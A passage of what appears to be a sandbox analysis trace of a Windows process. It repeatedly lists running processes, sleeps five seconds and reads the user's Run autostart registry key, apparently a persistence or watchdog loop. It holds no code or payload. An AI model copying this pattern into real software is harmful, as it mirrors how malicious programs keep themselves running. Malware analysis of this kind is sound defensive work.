returned 0x0 [0304.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.113] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.114] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.114] NtClose (Handle=0x378) returned 0x0 [0304.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.170] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.172] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.172] NtClose (Handle=0x378) returned 0x0 [0304.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.258] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.259] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.260] NtClose (Handle=0x378) returned 0x0 [0304.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.275] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.278] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.278] NtClose (Handle=0x378) returned 0x0 [0304.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.290] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.291] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.291] NtClose (Handle=0x378) returned 0x0 [0304.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.322] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.324] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.324] NtClose (Handle=0x378) returned 0x0 [0304.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.335] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.337] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.337] NtClose (Handle=0x378) returned 0x0 [0304.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.347] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.348] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.349] NtClose (Handle=0x378) returned 0x0 [0304.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.357] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.359] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.360] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.360] NtClose (Handle=0x378) returned 0x0 [0304.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.372] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.373] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.373] NtClose (Handle=0x378) returned 0x0 [0304.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.389] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.391] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.391] NtClose (Handle=0x378) returned 0x0 [0304.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.404] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.406] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.406] NtClose (Handle=0x378) returned 0x0 [0304.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.418] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.419] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.419] NtClose (Handle=0x378) returned 0x0 [0304.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 